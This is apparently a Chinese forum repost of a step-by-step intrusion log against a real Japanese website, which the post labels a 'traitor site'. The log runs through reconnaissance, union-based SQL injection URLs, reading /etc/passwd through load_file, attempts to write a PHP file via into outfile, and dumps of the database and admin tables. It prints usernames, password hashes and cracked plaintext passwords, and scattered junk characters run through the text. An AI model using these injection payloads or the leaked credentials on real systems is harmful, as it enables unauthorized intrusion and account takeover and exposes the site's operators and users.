原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

. i8 m  ~0 Q/ C0x01. 检测 www.zuaa.jp 收集数据

( q0 [3 u6 j4 i) Z- z
, y% F. c0 h8 h8 J% mwhatweb


8 D7 j9 {' r- Q4 S利用NMAP扫描

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
0 _8 |+ U& S1 M+ k# t1 |找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390

3 L; i3 G  ^: g( n( g' n
& H. u; h' z. J: a( B( W  @9 T6 q0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
' h) F0 G# }6 \5 h- J$ M
  Q, ?: L- V3 }4 A! b' jorder by 28报错，order by 27正常
+ E: l$ H; Y8 v1 e
0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
4 O$ ]. u$ \, q1 V添加到 27 时正常显示

+ a: ]  `; F8 C5 Y中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x05. info:
+ M) U0 \+ j: C4 Yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
$ g1 R$ i7 T/ `& z
user:            root@localhost
- y* `* o# ^6 U: ?8 D* ydatabase:    openpne
version:      4.1.22
6 \) Y1 {9 ~5 T& a% ?. U# hos:             portbld-freebsd5.4
5 q6 T: |& v) x3 X3 A- j7 k
0x06. root用户
" E" v3 [% J, C2 \/ n( `# }) y% Q利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
5 U$ n9 H- {4 q5 u+ R  ?  o/ U" Jhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
) _9 y( \7 J7 q, c8 r  t; [% D4 K
通过工具转换

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
( n" a- C' }) k" g3 C' a2 X- N) R
* D! E4 v, N; V' n0x07. 利用 into outfile
. i3 N( @; b' l+ r全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
8 _. [' a. `5 J( _) J: t- r" F9 L
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

" a  y. P$ x' O页面显示“MDB2 Error:syntax error”

0x08. 利用 mysql 4.1
$ G# N0 R8 N! u; b猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
( l- I5 _$ g* {. S
! y( ?1 j5 B% ?' K% Z( b0 _1 {% W
" j% _2 S( f9 h; z) g
0x09. 查找后台
1 b( _# i9 }- J  @利用 现有的各种 后台工具尝试都不行

0x10.  MySL外联方法
+ d' a* e* e; R- z从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
9 o7 _; q7 N( m8 p1 T! a; |http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

6 n* s( ^5 h9 y- f* w" E) C这个可以在 www.cmd5.com 解密
' K1 u) B6 l! X4 y% w! T% Jroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
! C1 J% n. S  X, j% L- w3 X) Rchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
2 ^, c3 V( v! T+ i) Xzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
5 d/ x. z  z3 a) p* N
- V5 X: S0 ]. _( b1 g* r
# K( t  p# E- j" M. l0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码


0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login
1 C" E4 N# F7 V) I
/ K7 c2 n# \1 V9 \" t1 a表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

% O( G; v, e  ?" l/ c解密
  ^1 |) ^- a0 n) a# {zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

* j3 n: A8 h$ J) U  u2 I6 K: o0x13. 登录后台
. R% g% m4 r$ e& E# l* ~
- c" h% X; J( h
4 U  ]) E% }; Z1 |! c
$ N! [4 {) x5 N6 |% e0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
" ^' G" r3 P/ O% K! L, {------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
. P# b1 c" R3 K0 c1 e! H( o9 i
% p* N" f! |9 d最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
" J% `4 \$ q* [0 E; u

荒村狂客

哪个牛人 费的这劲 入侵的